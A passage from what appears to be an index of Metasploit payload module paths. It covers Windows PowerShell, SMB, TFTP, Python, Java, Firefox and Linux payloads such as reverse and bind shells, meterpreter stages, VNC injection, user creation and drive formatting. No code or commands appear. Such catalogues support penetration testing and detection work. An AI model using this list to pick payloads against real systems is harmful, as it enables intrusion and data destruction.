| payload/cmd/windows/powershell/dllinject/bind_hidden_ipknock_tcp | payload/cmd/windows/powershell/dllinject/bind_hidden_tcp | payload/cmd/windows/powershell/dllinject/bind_ipv6_tcp | payload/cmd/windows/powershell/dllinject/bind_ipv6_tcp_uuid | payload/cmd/windows/powershell/dllinject/bind_named_pipe | payload/cmd/windows/powershell/dllinject/bind_nonx_tcp | payload/cmd/windows/powershell/dllinject/bind_tcp | payload/cmd/windows/powershell/dllinject/bind_tcp_rc4 | payload/cmd/windows/powershell/dllinject/bind_tcp_uuid | payload/cmd/windows/powershell/dllinject/find_tag | payload/cmd/windows/powershell/dllinject/reverse_hop_http | payload/cmd/windows/powershell/dllinject/reverse_http | payload/cmd/windows/powershell/dllinject/reverse_http_proxy_pstore | payload/cmd/windows/powershell/dllinject/reverse_ipv6_tcp | payload/cmd/windows/powershell/dllinject/reverse_nonx_tcp | payload/cmd/windows/powershell/dllinject/reverse_ord_tcp | payload/cmd/windows/powershell/dllinject/reverse_tcp | payload/cmd/windows/powershell/dllinject/reverse_tcp_allports | payload/cmd/windows/powershell/dllinject/reverse_tcp_dns | payload/cmd/windows/powershell/dllinject/reverse_tcp_rc4 | payload/cmd/windows/powershell/dllinject/reverse_tcp_rc4_dns | payload/cmd/windows/powershell/dllinject/reverse_tcp_uuid | payload/cmd/windows/powershell/dllinject/reverse_winhttp | . | generic (2) . | payload/cmd/windows/powershell/generic/debug_trap | payload/cmd/windows/powershell/generic/tight_loop | . | meterpreter (27) . 
| payload/cmd/windows/powershell/meterpreter/bind_hidden_ipknock_tcp | payload/cmd/windows/powershell/meterpreter/bind_hidden_tcp | payload/cmd/windows/powershell/meterpreter/bind_ipv6_tcp | payload/cmd/windows/powershell/meterpreter/bind_ipv6_tcp_uuid | payload/cmd/windows/powershell/meterpreter/bind_named_pipe | payload/cmd/windows/powershell/meterpreter/bind_nonx_tcp | payload/cmd/windows/powershell/meterpreter/bind_tcp | payload/cmd/windows/powershell/meterpreter/bind_tcp_rc4 | payload/cmd/windows/powershell/meterpreter/bind_tcp_uuid | payload/cmd/windows/powershell/meterpreter/find_tag | payload/cmd/windows/powershell/meterpreter/reverse_hop_http | payload/cmd/windows/powershell/meterpreter/reverse_http | payload/cmd/windows/powershell/meterpreter/reverse_http_proxy_pstore | payload/cmd/windows/powershell/meterpreter/reverse_https | payload/cmd/windows/powershell/meterpreter/reverse_https_proxy | payload/cmd/windows/powershell/meterpreter/reverse_ipv6_tcp | payload/cmd/windows/powershell/meterpreter/reverse_named_pipe | payload/cmd/windows/powershell/meterpreter/reverse_nonx_tcp | payload/cmd/windows/powershell/meterpreter/reverse_ord_tcp | payload/cmd/windows/powershell/meterpreter/reverse_tcp | payload/cmd/windows/powershell/meterpreter/reverse_tcp_allports | payload/cmd/windows/powershell/meterpreter/reverse_tcp_dns | payload/cmd/windows/powershell/meterpreter/reverse_tcp_rc4 | payload/cmd/windows/powershell/meterpreter/reverse_tcp_rc4_dns | payload/cmd/windows/powershell/meterpreter/reverse_tcp_uuid | payload/cmd/windows/powershell/meterpreter/reverse_winhttp | payload/cmd/windows/powershell/meterpreter/reverse_winhttps | . | patchupdllinject (19) . 
| payload/cmd/windows/powershell/patchupdllinject/bind_hidden_ipknock_tcp | payload/cmd/windows/powershell/patchupdllinject/bind_hidden_tcp | payload/cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp | payload/cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp_uuid | payload/cmd/windows/powershell/patchupdllinject/bind_named_pipe | payload/cmd/windows/powershell/patchupdllinject/bind_nonx_tcp | payload/cmd/windows/powershell/patchupdllinject/bind_tcp | payload/cmd/windows/powershell/patchupdllinject/bind_tcp_rc4 | payload/cmd/windows/powershell/patchupdllinject/bind_tcp_uuid | payload/cmd/windows/powershell/patchupdllinject/find_tag | payload/cmd/windows/powershell/patchupdllinject/reverse_ipv6_tcp | payload/cmd/windows/powershell/patchupdllinject/reverse_nonx_tcp | payload/cmd/windows/powershell/patchupdllinject/reverse_ord_tcp | payload/cmd/windows/powershell/patchupdllinject/reverse_tcp | payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_allports | payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_dns | payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4 | payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4_dns | payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_uuid | . | patchupmeterpreter (19) . 
| payload/cmd/windows/powershell/patchupmeterpreter/bind_hidden_ipknock_tcp | payload/cmd/windows/powershell/patchupmeterpreter/bind_hidden_tcp | payload/cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp | payload/cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp_uuid | payload/cmd/windows/powershell/patchupmeterpreter/bind_named_pipe | payload/cmd/windows/powershell/patchupmeterpreter/bind_nonx_tcp | payload/cmd/windows/powershell/patchupmeterpreter/bind_tcp | payload/cmd/windows/powershell/patchupmeterpreter/bind_tcp_rc4 | payload/cmd/windows/powershell/patchupmeterpreter/bind_tcp_uuid | payload/cmd/windows/powershell/patchupmeterpreter/find_tag | payload/cmd/windows/powershell/patchupmeterpreter/reverse_ipv6_tcp | payload/cmd/windows/powershell/patchupmeterpreter/reverse_nonx_tcp | payload/cmd/windows/powershell/patchupmeterpreter/reverse_ord_tcp | payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp | payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_allports | payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_dns | payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4 | payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4_dns | payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_uuid | . | peinject (20) . 
| payload/cmd/windows/powershell/peinject/bind_hidden_ipknock_tcp | payload/cmd/windows/powershell/peinject/bind_hidden_tcp | payload/cmd/windows/powershell/peinject/bind_ipv6_tcp | payload/cmd/windows/powershell/peinject/bind_ipv6_tcp_uuid | payload/cmd/windows/powershell/peinject/bind_named_pipe | payload/cmd/windows/powershell/peinject/bind_nonx_tcp | payload/cmd/windows/powershell/peinject/bind_tcp | payload/cmd/windows/powershell/peinject/bind_tcp_rc4 | payload/cmd/windows/powershell/peinject/bind_tcp_uuid | payload/cmd/windows/powershell/peinject/find_tag | payload/cmd/windows/powershell/peinject/reverse_ipv6_tcp | payload/cmd/windows/powershell/peinject/reverse_named_pipe | payload/cmd/windows/powershell/peinject/reverse_nonx_tcp | payload/cmd/windows/powershell/peinject/reverse_ord_tcp | payload/cmd/windows/powershell/peinject/reverse_tcp | payload/cmd/windows/powershell/peinject/reverse_tcp_allports | payload/cmd/windows/powershell/peinject/reverse_tcp_dns | payload/cmd/windows/powershell/peinject/reverse_tcp_rc4 | payload/cmd/windows/powershell/peinject/reverse_tcp_rc4_dns | payload/cmd/windows/powershell/peinject/reverse_tcp_uuid | . | shell (20) . 
| payload/cmd/windows/powershell/shell/bind_hidden_ipknock_tcp | payload/cmd/windows/powershell/shell/bind_hidden_tcp | payload/cmd/windows/powershell/shell/bind_ipv6_tcp | payload/cmd/windows/powershell/shell/bind_ipv6_tcp_uuid | payload/cmd/windows/powershell/shell/bind_named_pipe | payload/cmd/windows/powershell/shell/bind_nonx_tcp | payload/cmd/windows/powershell/shell/bind_tcp | payload/cmd/windows/powershell/shell/bind_tcp_rc4 | payload/cmd/windows/powershell/shell/bind_tcp_uuid | payload/cmd/windows/powershell/shell/find_tag | payload/cmd/windows/powershell/shell/reverse_ipv6_tcp | payload/cmd/windows/powershell/shell/reverse_nonx_tcp | payload/cmd/windows/powershell/shell/reverse_ord_tcp | payload/cmd/windows/powershell/shell/reverse_tcp | payload/cmd/windows/powershell/shell/reverse_tcp_allports | payload/cmd/windows/powershell/shell/reverse_tcp_dns | payload/cmd/windows/powershell/shell/reverse_tcp_rc4 | payload/cmd/windows/powershell/shell/reverse_tcp_rc4_dns | payload/cmd/windows/powershell/shell/reverse_tcp_uuid | payload/cmd/windows/powershell/shell/reverse_udp | . | upexec (20) . 
| payload/cmd/windows/powershell/upexec/bind_hidden_ipknock_tcp | payload/cmd/windows/powershell/upexec/bind_hidden_tcp | payload/cmd/windows/powershell/upexec/bind_ipv6_tcp | payload/cmd/windows/powershell/upexec/bind_ipv6_tcp_uuid | payload/cmd/windows/powershell/upexec/bind_named_pipe | payload/cmd/windows/powershell/upexec/bind_nonx_tcp | payload/cmd/windows/powershell/upexec/bind_tcp | payload/cmd/windows/powershell/upexec/bind_tcp_rc4 | payload/cmd/windows/powershell/upexec/bind_tcp_uuid | payload/cmd/windows/powershell/upexec/find_tag | payload/cmd/windows/powershell/upexec/reverse_ipv6_tcp | payload/cmd/windows/powershell/upexec/reverse_nonx_tcp | payload/cmd/windows/powershell/upexec/reverse_ord_tcp | payload/cmd/windows/powershell/upexec/reverse_tcp | payload/cmd/windows/powershell/upexec/reverse_tcp_allports | payload/cmd/windows/powershell/upexec/reverse_tcp_dns | payload/cmd/windows/powershell/upexec/reverse_tcp_rc4 | payload/cmd/windows/powershell/upexec/reverse_tcp_rc4_dns | payload/cmd/windows/powershell/upexec/reverse_tcp_uuid | payload/cmd/windows/powershell/upexec/reverse_udp | . | vncinject (23) . 
| payload/cmd/windows/powershell/vncinject/bind_hidden_ipknock_tcp | payload/cmd/windows/powershell/vncinject/bind_hidden_tcp | payload/cmd/windows/powershell/vncinject/bind_ipv6_tcp | payload/cmd/windows/powershell/vncinject/bind_ipv6_tcp_uuid | payload/cmd/windows/powershell/vncinject/bind_named_pipe | payload/cmd/windows/powershell/vncinject/bind_nonx_tcp | payload/cmd/windows/powershell/vncinject/bind_tcp | payload/cmd/windows/powershell/vncinject/bind_tcp_rc4 | payload/cmd/windows/powershell/vncinject/bind_tcp_uuid | payload/cmd/windows/powershell/vncinject/find_tag | payload/cmd/windows/powershell/vncinject/reverse_hop_http | payload/cmd/windows/powershell/vncinject/reverse_http | payload/cmd/windows/powershell/vncinject/reverse_http_proxy_pstore | payload/cmd/windows/powershell/vncinject/reverse_ipv6_tcp | payload/cmd/windows/powershell/vncinject/reverse_nonx_tcp | payload/cmd/windows/powershell/vncinject/reverse_ord_tcp | payload/cmd/windows/powershell/vncinject/reverse_tcp | payload/cmd/windows/powershell/vncinject/reverse_tcp_allports | payload/cmd/windows/powershell/vncinject/reverse_tcp_dns | payload/cmd/windows/powershell/vncinject/reverse_tcp_rc4 | payload/cmd/windows/powershell/vncinject/reverse_tcp_rc4_dns | payload/cmd/windows/powershell/vncinject/reverse_tcp_uuid | payload/cmd/windows/powershell/vncinject/reverse_winhttp | . | x64 (70) . | custom (14) . 
| payload/cmd/windows/powershell/x64/custom/bind_ipv6_tcp | payload/cmd/windows/powershell/x64/custom/bind_ipv6_tcp_uuid | payload/cmd/windows/powershell/x64/custom/bind_named_pipe | payload/cmd/windows/powershell/x64/custom/bind_tcp | payload/cmd/windows/powershell/x64/custom/bind_tcp_rc4 | payload/cmd/windows/powershell/x64/custom/bind_tcp_uuid | payload/cmd/windows/powershell/x64/custom/reverse_http | payload/cmd/windows/powershell/x64/custom/reverse_https | payload/cmd/windows/powershell/x64/custom/reverse_named_pipe | payload/cmd/windows/powershell/x64/custom/reverse_tcp | payload/cmd/windows/powershell/x64/custom/reverse_tcp_rc4 | payload/cmd/windows/powershell/x64/custom/reverse_tcp_uuid | payload/cmd/windows/powershell/x64/custom/reverse_winhttp | payload/cmd/windows/powershell/x64/custom/reverse_winhttps | . | encrypted_shell (1) . | payload/cmd/windows/powershell/x64/encrypted_shell/reverse_tcp | . | meterpreter (14) . | payload/cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp | payload/cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp_uuid | payload/cmd/windows/powershell/x64/meterpreter/bind_named_pipe | payload/cmd/windows/powershell/x64/meterpreter/bind_tcp | payload/cmd/windows/powershell/x64/meterpreter/bind_tcp_rc4 | payload/cmd/windows/powershell/x64/meterpreter/bind_tcp_uuid | payload/cmd/windows/powershell/x64/meterpreter/reverse_http | payload/cmd/windows/powershell/x64/meterpreter/reverse_https | payload/cmd/windows/powershell/x64/meterpreter/reverse_named_pipe | payload/cmd/windows/powershell/x64/meterpreter/reverse_tcp | payload/cmd/windows/powershell/x64/meterpreter/reverse_tcp_rc4 | payload/cmd/windows/powershell/x64/meterpreter/reverse_tcp_uuid | payload/cmd/windows/powershell/x64/meterpreter/reverse_winhttp | payload/cmd/windows/powershell/x64/meterpreter/reverse_winhttps | . | peinject (10) . 
| payload/cmd/windows/powershell/x64/peinject/bind_ipv6_tcp | payload/cmd/windows/powershell/x64/peinject/bind_ipv6_tcp_uuid | payload/cmd/windows/powershell/x64/peinject/bind_named_pipe | payload/cmd/windows/powershell/x64/peinject/bind_tcp | payload/cmd/windows/powershell/x64/peinject/bind_tcp_rc4 | payload/cmd/windows/powershell/x64/peinject/bind_tcp_uuid | payload/cmd/windows/powershell/x64/peinject/reverse_named_pipe | payload/cmd/windows/powershell/x64/peinject/reverse_tcp | payload/cmd/windows/powershell/x64/peinject/reverse_tcp_rc4 | payload/cmd/windows/powershell/x64/peinject/reverse_tcp_uuid | . | shell (9) . | payload/cmd/windows/powershell/x64/shell/bind_ipv6_tcp | payload/cmd/windows/powershell/x64/shell/bind_ipv6_tcp_uuid | payload/cmd/windows/powershell/x64/shell/bind_named_pipe | payload/cmd/windows/powershell/x64/shell/bind_tcp | payload/cmd/windows/powershell/x64/shell/bind_tcp_rc4 | payload/cmd/windows/powershell/x64/shell/bind_tcp_uuid | payload/cmd/windows/powershell/x64/shell/reverse_tcp | payload/cmd/windows/powershell/x64/shell/reverse_tcp_rc4 | payload/cmd/windows/powershell/x64/shell/reverse_tcp_uuid | . | vncinject (13) . | payload/cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp | payload/cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp_uuid | payload/cmd/windows/powershell/x64/vncinject/bind_named_pipe | payload/cmd/windows/powershell/x64/vncinject/bind_tcp | payload/cmd/windows/powershell/x64/vncinject/bind_tcp_rc4 | payload/cmd/windows/powershell/x64/vncinject/bind_tcp_uuid | payload/cmd/windows/powershell/x64/vncinject/reverse_http | payload/cmd/windows/powershell/x64/vncinject/reverse_https | payload/cmd/windows/powershell/x64/vncinject/reverse_tcp | payload/cmd/windows/powershell/x64/vncinject/reverse_tcp_rc4 | payload/cmd/windows/powershell/x64/vncinject/reverse_tcp_uuid | payload/cmd/windows/powershell/x64/vncinject/reverse_winhttp | payload/cmd/windows/powershell/x64/vncinject/reverse_winhttps | . 
| payload/cmd/windows/powershell/x64/exec | payload/cmd/windows/powershell/x64/loadlibrary | payload/cmd/windows/powershell/x64/messagebox | payload/cmd/windows/powershell/x64/pingback_reverse_tcp | payload/cmd/windows/powershell/x64/powershell_bind_tcp | payload/cmd/windows/powershell/x64/powershell_reverse_tcp | payload/cmd/windows/powershell/x64/powershell_reverse_tcp_ssl | payload/cmd/windows/powershell/x64/shell_bind_tcp | payload/cmd/windows/powershell/x64/shell_reverse_tcp | . | payload/cmd/windows/powershell/adduser | payload/cmd/windows/powershell/dns_txt_query_exec | payload/cmd/windows/powershell/download_exec | payload/cmd/windows/powershell/exec | payload/cmd/windows/powershell/format_all_drives | payload/cmd/windows/powershell/loadlibrary | payload/cmd/windows/powershell/messagebox | payload/cmd/windows/powershell/metsvc_bind_tcp | payload/cmd/windows/powershell/metsvc_reverse_tcp | payload/cmd/windows/powershell/pingback_bind_tcp | payload/cmd/windows/powershell/pingback_reverse_tcp | payload/cmd/windows/powershell/powershell_bind_tcp | payload/cmd/windows/powershell/powershell_reverse_tcp | payload/cmd/windows/powershell/powershell_reverse_tcp_ssl | payload/cmd/windows/powershell/shell_bind_tcp | payload/cmd/windows/powershell/shell_bind_tcp_xpfw | payload/cmd/windows/powershell/shell_hidden_bind_tcp | payload/cmd/windows/powershell/shell_reverse_tcp | payload/cmd/windows/powershell/speak_pwned | . | python (18) . | meterpreter (7) . | payload/cmd/windows/python/meterpreter/bind_tcp | payload/cmd/windows/python/meterpreter/bind_tcp_uuid | payload/cmd/windows/python/meterpreter/reverse_http | payload/cmd/windows/python/meterpreter/reverse_https | payload/cmd/windows/python/meterpreter/reverse_tcp | payload/cmd/windows/python/meterpreter/reverse_tcp_ssl | payload/cmd/windows/python/meterpreter/reverse_tcp_uuid | . 
| payload/cmd/windows/python/meterpreter_bind_tcp | payload/cmd/windows/python/meterpreter_reverse_http | payload/cmd/windows/python/meterpreter_reverse_https | payload/cmd/windows/python/meterpreter_reverse_tcp | payload/cmd/windows/python/pingback_bind_tcp | payload/cmd/windows/python/pingback_reverse_tcp | payload/cmd/windows/python/shell_bind_tcp | payload/cmd/windows/python/shell_reverse_sctp | payload/cmd/windows/python/shell_reverse_tcp | payload/cmd/windows/python/shell_reverse_tcp_ssl | payload/cmd/windows/python/shell_reverse_udp | . | smb (77) . | x64 (77) . | custom (14) . | payload/cmd/windows/smb/x64/custom/bind_ipv6_tcp | payload/cmd/windows/smb/x64/custom/bind_ipv6_tcp_uuid | payload/cmd/windows/smb/x64/custom/bind_named_pipe | payload/cmd/windows/smb/x64/custom/bind_tcp | payload/cmd/windows/smb/x64/custom/bind_tcp_rc4 | payload/cmd/windows/smb/x64/custom/bind_tcp_uuid | payload/cmd/windows/smb/x64/custom/reverse_http | payload/cmd/windows/smb/x64/custom/reverse_https | payload/cmd/windows/smb/x64/custom/reverse_named_pipe | payload/cmd/windows/smb/x64/custom/reverse_tcp | payload/cmd/windows/smb/x64/custom/reverse_tcp_rc4 | payload/cmd/windows/smb/x64/custom/reverse_tcp_uuid | payload/cmd/windows/smb/x64/custom/reverse_winhttp | payload/cmd/windows/smb/x64/custom/reverse_winhttps | . | encrypted_shell (1) . | payload/cmd/windows/smb/x64/encrypted_shell/reverse_tcp | . | meterpreter (14) . 
| payload/cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp | payload/cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp_uuid | payload/cmd/windows/smb/x64/meterpreter/bind_named_pipe | payload/cmd/windows/smb/x64/meterpreter/bind_tcp | payload/cmd/windows/smb/x64/meterpreter/bind_tcp_rc4 | payload/cmd/windows/smb/x64/meterpreter/bind_tcp_uuid | payload/cmd/windows/smb/x64/meterpreter/reverse_http | payload/cmd/windows/smb/x64/meterpreter/reverse_https | payload/cmd/windows/smb/x64/meterpreter/reverse_named_pipe | payload/cmd/windows/smb/x64/meterpreter/reverse_tcp | payload/cmd/windows/smb/x64/meterpreter/reverse_tcp_rc4 | payload/cmd/windows/smb/x64/meterpreter/reverse_tcp_uuid | payload/cmd/windows/smb/x64/meterpreter/reverse_winhttp | payload/cmd/windows/smb/x64/meterpreter/reverse_winhttps | . | peinject (10) . | payload/cmd/windows/smb/x64/peinject/bind_ipv6_tcp | payload/cmd/windows/smb/x64/peinject/bind_ipv6_tcp_uuid | payload/cmd/windows/smb/x64/peinject/bind_named_pipe | payload/cmd/windows/smb/x64/peinject/bind_tcp | payload/cmd/windows/smb/x64/peinject/bind_tcp_rc4 | payload/cmd/windows/smb/x64/peinject/bind_tcp_uuid | payload/cmd/windows/smb/x64/peinject/reverse_named_pipe | payload/cmd/windows/smb/x64/peinject/reverse_tcp | payload/cmd/windows/smb/x64/peinject/reverse_tcp_rc4 | payload/cmd/windows/smb/x64/peinject/reverse_tcp_uuid | . | shell (9) . | payload/cmd/windows/smb/x64/shell/bind_ipv6_tcp | payload/cmd/windows/smb/x64/shell/bind_ipv6_tcp_uuid | payload/cmd/windows/smb/x64/shell/bind_named_pipe | payload/cmd/windows/smb/x64/shell/bind_tcp | payload/cmd/windows/smb/x64/shell/bind_tcp_rc4 | payload/cmd/windows/smb/x64/shell/bind_tcp_uuid | payload/cmd/windows/smb/x64/shell/reverse_tcp | payload/cmd/windows/smb/x64/shell/reverse_tcp_rc4 | payload/cmd/windows/smb/x64/shell/reverse_tcp_uuid | . | vncinject (13) . 
| payload/cmd/windows/smb/x64/vncinject/bind_ipv6_tcp | payload/cmd/windows/smb/x64/vncinject/bind_ipv6_tcp_uuid | payload/cmd/windows/smb/x64/vncinject/bind_named_pipe | payload/cmd/windows/smb/x64/vncinject/bind_tcp | payload/cmd/windows/smb/x64/vncinject/bind_tcp_rc4 | payload/cmd/windows/smb/x64/vncinject/bind_tcp_uuid | payload/cmd/windows/smb/x64/vncinject/reverse_http | payload/cmd/windows/smb/x64/vncinject/reverse_https | payload/cmd/windows/smb/x64/vncinject/reverse_tcp | payload/cmd/windows/smb/x64/vncinject/reverse_tcp_rc4 | payload/cmd/windows/smb/x64/vncinject/reverse_tcp_uuid | payload/cmd/windows/smb/x64/vncinject/reverse_winhttp | payload/cmd/windows/smb/x64/vncinject/reverse_winhttps | . | payload/cmd/windows/smb/x64/encrypted_shell_reverse_tcp | payload/cmd/windows/smb/x64/exec | payload/cmd/windows/smb/x64/loadlibrary | payload/cmd/windows/smb/x64/messagebox | payload/cmd/windows/smb/x64/meterpreter_bind_named_pipe | payload/cmd/windows/smb/x64/meterpreter_bind_tcp | payload/cmd/windows/smb/x64/meterpreter_reverse_http | payload/cmd/windows/smb/x64/meterpreter_reverse_https | payload/cmd/windows/smb/x64/meterpreter_reverse_ipv6_tcp | payload/cmd/windows/smb/x64/meterpreter_reverse_tcp | payload/cmd/windows/smb/x64/pingback_reverse_tcp | payload/cmd/windows/smb/x64/powershell_bind_tcp | payload/cmd/windows/smb/x64/powershell_reverse_tcp | payload/cmd/windows/smb/x64/powershell_reverse_tcp_ssl | payload/cmd/windows/smb/x64/shell_bind_tcp | payload/cmd/windows/smb/x64/shell_reverse_tcp | . | . | tftp (77) . | x64 (77) . | custom (14) . 
| payload/cmd/windows/tftp/x64/custom/bind_ipv6_tcp | payload/cmd/windows/tftp/x64/custom/bind_ipv6_tcp_uuid | payload/cmd/windows/tftp/x64/custom/bind_named_pipe | payload/cmd/windows/tftp/x64/custom/bind_tcp | payload/cmd/windows/tftp/x64/custom/bind_tcp_rc4 | payload/cmd/windows/tftp/x64/custom/bind_tcp_uuid | payload/cmd/windows/tftp/x64/custom/reverse_http | payload/cmd/windows/tftp/x64/custom/reverse_https | payload/cmd/windows/tftp/x64/custom/reverse_named_pipe | payload/cmd/windows/tftp/x64/custom/reverse_tcp | payload/cmd/windows/tftp/x64/custom/reverse_tcp_rc4 | payload/cmd/windows/tftp/x64/custom/reverse_tcp_uuid | payload/cmd/windows/tftp/x64/custom/reverse_winhttp | payload/cmd/windows/tftp/x64/custom/reverse_winhttps | . | encrypted_shell (1) . | payload/cmd/windows/tftp/x64/encrypted_shell/reverse_tcp | . | meterpreter (14) . | payload/cmd/windows/tftp/x64/meterpreter/bind_ipv6_tcp | payload/cmd/windows/tftp/x64/meterpreter/bind_ipv6_tcp_uuid | payload/cmd/windows/tftp/x64/meterpreter/bind_named_pipe | payload/cmd/windows/tftp/x64/meterpreter/bind_tcp | payload/cmd/windows/tftp/x64/meterpreter/bind_tcp_rc4 | payload/cmd/windows/tftp/x64/meterpreter/bind_tcp_uuid | payload/cmd/windows/tftp/x64/meterpreter/reverse_http | payload/cmd/windows/tftp/x64/meterpreter/reverse_https | payload/cmd/windows/tftp/x64/meterpreter/reverse_named_pipe | payload/cmd/windows/tftp/x64/meterpreter/reverse_tcp | payload/cmd/windows/tftp/x64/meterpreter/reverse_tcp_rc4 | payload/cmd/windows/tftp/x64/meterpreter/reverse_tcp_uuid | payload/cmd/windows/tftp/x64/meterpreter/reverse_winhttp | payload/cmd/windows/tftp/x64/meterpreter/reverse_winhttps | . | peinject (10) . 
| payload/cmd/windows/tftp/x64/peinject/bind_ipv6_tcp | payload/cmd/windows/tftp/x64/peinject/bind_ipv6_tcp_uuid | payload/cmd/windows/tftp/x64/peinject/bind_named_pipe | payload/cmd/windows/tftp/x64/peinject/bind_tcp | payload/cmd/windows/tftp/x64/peinject/bind_tcp_rc4 | payload/cmd/windows/tftp/x64/peinject/bind_tcp_uuid | payload/cmd/windows/tftp/x64/peinject/reverse_named_pipe | payload/cmd/windows/tftp/x64/peinject/reverse_tcp | payload/cmd/windows/tftp/x64/peinject/reverse_tcp_rc4 | payload/cmd/windows/tftp/x64/peinject/reverse_tcp_uuid | . | shell (9) . | payload/cmd/windows/tftp/x64/shell/bind_ipv6_tcp | payload/cmd/windows/tftp/x64/shell/bind_ipv6_tcp_uuid | payload/cmd/windows/tftp/x64/shell/bind_named_pipe | payload/cmd/windows/tftp/x64/shell/bind_tcp | payload/cmd/windows/tftp/x64/shell/bind_tcp_rc4 | payload/cmd/windows/tftp/x64/shell/bind_tcp_uuid | payload/cmd/windows/tftp/x64/shell/reverse_tcp | payload/cmd/windows/tftp/x64/shell/reverse_tcp_rc4 | payload/cmd/windows/tftp/x64/shell/reverse_tcp_uuid | . | vncinject (13) . | payload/cmd/windows/tftp/x64/vncinject/bind_ipv6_tcp | payload/cmd/windows/tftp/x64/vncinject/bind_ipv6_tcp_uuid | payload/cmd/windows/tftp/x64/vncinject/bind_named_pipe | payload/cmd/windows/tftp/x64/vncinject/bind_tcp | payload/cmd/windows/tftp/x64/vncinject/bind_tcp_rc4 | payload/cmd/windows/tftp/x64/vncinject/bind_tcp_uuid | payload/cmd/windows/tftp/x64/vncinject/reverse_http | payload/cmd/windows/tftp/x64/vncinject/reverse_https | payload/cmd/windows/tftp/x64/vncinject/reverse_tcp | payload/cmd/windows/tftp/x64/vncinject/reverse_tcp_rc4 | payload/cmd/windows/tftp/x64/vncinject/reverse_tcp_uuid | payload/cmd/windows/tftp/x64/vncinject/reverse_winhttp | payload/cmd/windows/tftp/x64/vncinject/reverse_winhttps | . 
| payload/cmd/windows/tftp/x64/encrypted_shell_reverse_tcp | payload/cmd/windows/tftp/x64/exec | payload/cmd/windows/tftp/x64/loadlibrary | payload/cmd/windows/tftp/x64/messagebox | payload/cmd/windows/tftp/x64/meterpreter_bind_named_pipe | payload/cmd/windows/tftp/x64/meterpreter_bind_tcp | payload/cmd/windows/tftp/x64/meterpreter_reverse_http | payload/cmd/windows/tftp/x64/meterpreter_reverse_https | payload/cmd/windows/tftp/x64/meterpreter_reverse_ipv6_tcp | payload/cmd/windows/tftp/x64/meterpreter_reverse_tcp | payload/cmd/windows/tftp/x64/pingback_reverse_tcp | payload/cmd/windows/tftp/x64/powershell_bind_tcp | payload/cmd/windows/tftp/x64/powershell_reverse_tcp | payload/cmd/windows/tftp/x64/powershell_reverse_tcp_ssl | payload/cmd/windows/tftp/x64/shell_bind_tcp | payload/cmd/windows/tftp/x64/shell_reverse_tcp | . | . | payload/cmd/windows/adduser | payload/cmd/windows/bind_lua | payload/cmd/windows/bind_perl | payload/cmd/windows/bind_perl_ipv6 | payload/cmd/windows/bind_ruby | payload/cmd/windows/download_eval_vbs | payload/cmd/windows/download_exec_vbs | payload/cmd/windows/generic | payload/cmd/windows/jjs_reverse_tcp | payload/cmd/windows/powershell_bind_tcp | payload/cmd/windows/powershell_reverse_tcp | payload/cmd/windows/powershell_reverse_tcp_ssl | payload/cmd/windows/reverse_lua | payload/cmd/windows/reverse_perl | payload/cmd/windows/reverse_powershell | payload/cmd/windows/reverse_ruby | . | . | firefox (3) . | payload/firefox/exec | payload/firefox/shell_bind_tcp | payload/firefox/shell_reverse_tcp | . | generic (7) . | ssh (1) . | payload/generic/ssh/interact | . | payload/generic/custom | payload/generic/debug_trap | payload/generic/shell_bind_aws_ssm | payload/generic/shell_bind_tcp | payload/generic/shell_reverse_tcp | payload/generic/tight_loop | . | java (9) . | meterpreter (4) . | payload/java/meterpreter/bind_tcp | payload/java/meterpreter/reverse_http | payload/java/meterpreter/reverse_https | payload/java/meterpreter/reverse_tcp | . 
| shell (2) . | payload/java/shell/bind_tcp | payload/java/shell/reverse_tcp | . | payload/java/jsp_shell_bind_tcp | payload/java/jsp_shell_reverse_tcp | payload/java/shell_reverse_tcp | . | linux (114) . | aarch64 (6) . | meterpreter (1) . | payload/linux/aarch64/meterpreter/reverse_tcp | . | shell (1) . | payload/linux/aarch64/shell/reverse_tcp | . | payload/linux/aarch64/meterpreter_reverse_http | payload/linux/aarch64/meterpreter_reverse_https | payload/linux/aarch64/meterpreter_reverse_tcp | payload/linux/aarch64/shell_reverse_tcp | . | armbe (4) . | payload/linux/armbe/meterpreter_reverse_http | payload/linux/armbe/meterpreter_reverse_https | payload/linux/armbe/meterpreter_reverse_tcp | payload/linux/armbe/shell_bind_tcp | . | armle (11) . | meterpreter (2) . | payload/linux/armle/meterpreter/bind_tcp | payload/linux/armle/meterpreter/reverse_tcp | . | shell (2) . | payload/linux/armle/shell/bind_tcp | payload/linux/armle/shell/reverse_tcp | . | payload/linux/armle/adduser | payload/linux/armle/exec | payload/linux/armle/meterpreter_reverse_http | payload/linux/armle/meterpreter_reverse_https | payload/linux/armle/meterpreter_reverse_tcp | payload/linux/armle/shell_bind_tcp | payload/linux/armle/shell_reverse_tcp | . | mips64 (3) . | payload/linux/mips64/meterpreter_reverse_http | payload/linux/mips64/meterpreter_reverse_https | payload/linux/mips64/meterpreter_reverse_tcp | . | mipsbe (9) . | meterpreter (1) . | payload/linux/mipsbe/meterpreter/reverse_tcp | . | shell (1) . | payload/linux/mipsbe/shell/reverse_tcp | . | payload/linux/mipsbe/exec | payload/linux/mipsbe/meterpreter_reverse_http | payload/linux/mipsbe/meterpreter_reverse_https | payload/linux/mipsbe/meterpreter_reverse_tcp | payload/linux/mipsbe/reboot | payload/linux/mipsbe/shell_bind_tcp | payload/linux/mipsbe/shell_reverse_tcp | . | mipsle (9) . | meterpreter (1) . | 